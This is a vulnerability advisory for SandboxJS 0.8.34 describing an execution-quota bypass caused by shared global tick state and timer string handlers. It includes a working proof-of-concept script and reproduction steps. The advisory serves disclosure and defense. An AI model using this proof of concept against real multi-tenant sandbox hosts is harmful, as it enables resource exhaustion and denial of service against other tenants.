CVE-2026-32723

Summary

/Users/zwique/Downloads/SandboxJS-0.8.34

/Users/zwique/Downloads/SandboxJS

currentTicks.current

currentTicks.current

Details

• Affected project: SandboxJS (owner: nyariv)
• Assumed checked-out version:

  SandboxJS-0.8.34

  at

  /Users/zwique/Downloads/SandboxJS-0.8.34

Vulnerable code paths

• /src/eval.ts

  —

  sandboxFunction

  binds

  ticks

  using

  ticks || currentTicks.current

  :

createFunction(..., ticks || currentTicks.current, { ...context, ... })

• /src/evaluator.ts

  /

  /src/executor.ts

  — global ticks:

export const currentTicks = { current: { ticks: BigInt(0) } as Ticks };

 execNoneRecurse(...) { currentTicks.current = ticks; ... }

• sandboxedSetTimeout

  compiles string handlers at execution time, not at scheduling time, which lets

  currentTicks.current

  be the wrong sandbox's ticks when compilation occurs.

Why This Is Vulnerable

• currentTicks.current

  is global mutable state shared across all sandbox instances.
• Timer string handlers are compiled at the moment the timer fires and read

  currentTicks.current

  at that time. If another sandbox runs between scheduling and execution, it can replace

  currentTicks.current

  . The scheduled timer's code will be compiled/executed with the other sandbox's tick budget. This allows the original sandbox's execution quota to be bypassed.

Proof of Concept

Run with Node.js; adjust path if needed.

// PoC (run with node); adjust path if needed
import Sandbox from '/Users/zwique/Downloads/SandboxJS-0.8.34/node modules/@nyariv/sandboxjs/build/Sandbox.js';

const globals = { ...Sandbox.SAFE GLOBALS, setTimeout, clearTimeout };
const prototypeWhitelist = Sandbox.SAFE PROTOTYPES;

const sandboxA = new Sandbox({
 globals,
 prototypeWhitelist,
 executionQuota: 50n,
 haltOnSandboxError: true,
});
let haltedA = false;
sandboxA.subscribeHalt(() => { haltedA = true; });

const sandboxB = new Sandbox({ globals, prototypeWhitelist });

// Sandbox A schedules a heavy string handler
sandboxA.compile(
 'setTimeout("let x=0; for (let i=0;i<200;i++){ x += i } globalThis.doneA = true;", 0);'
)().run();

// Run sandbox B before A's timer fires
sandboxB.compile('1+1')().run();

setTimeout(() => {
 console.log({ haltedA, doneA: sandboxA.context.sandboxGlobal.doneA });
}, 50);

Reproduction Steps

1. Place the PoC in

   hi.js

   and run:

node /Users/zwique/Downloads/SandboxJS-0.8.34/hi.js

2. Observe output similar to:

{ haltedA: false, doneA: true }

3. Remove the

   sandboxB.compile('1+1')().run();

   line and rerun. Output should now be:

{ haltedA: true }

Impact

• Type: Runtime guard bypass (execution-quota / watchdog bypass)
• Who is impacted: Applications that run multiple SandboxJS instances concurrently in the same process — multi-tenant interpreters, plugin engines, server-side scripting hosts, online code runners.
• Practical impact: Attackers controlling sandboxed code can bypass configured execution quotas/watchdog and perform CPU-intensive loops or long-running computation, enabling resource exhaustion/DoS or denial of service against the host process or other tenants.
• Does not (as tested) lead to: Host object exposure or direct sandbox escape (no

  process

  /

  require

  leakage observed from this primitive alone). Escalation to RCE was attempted and not observed.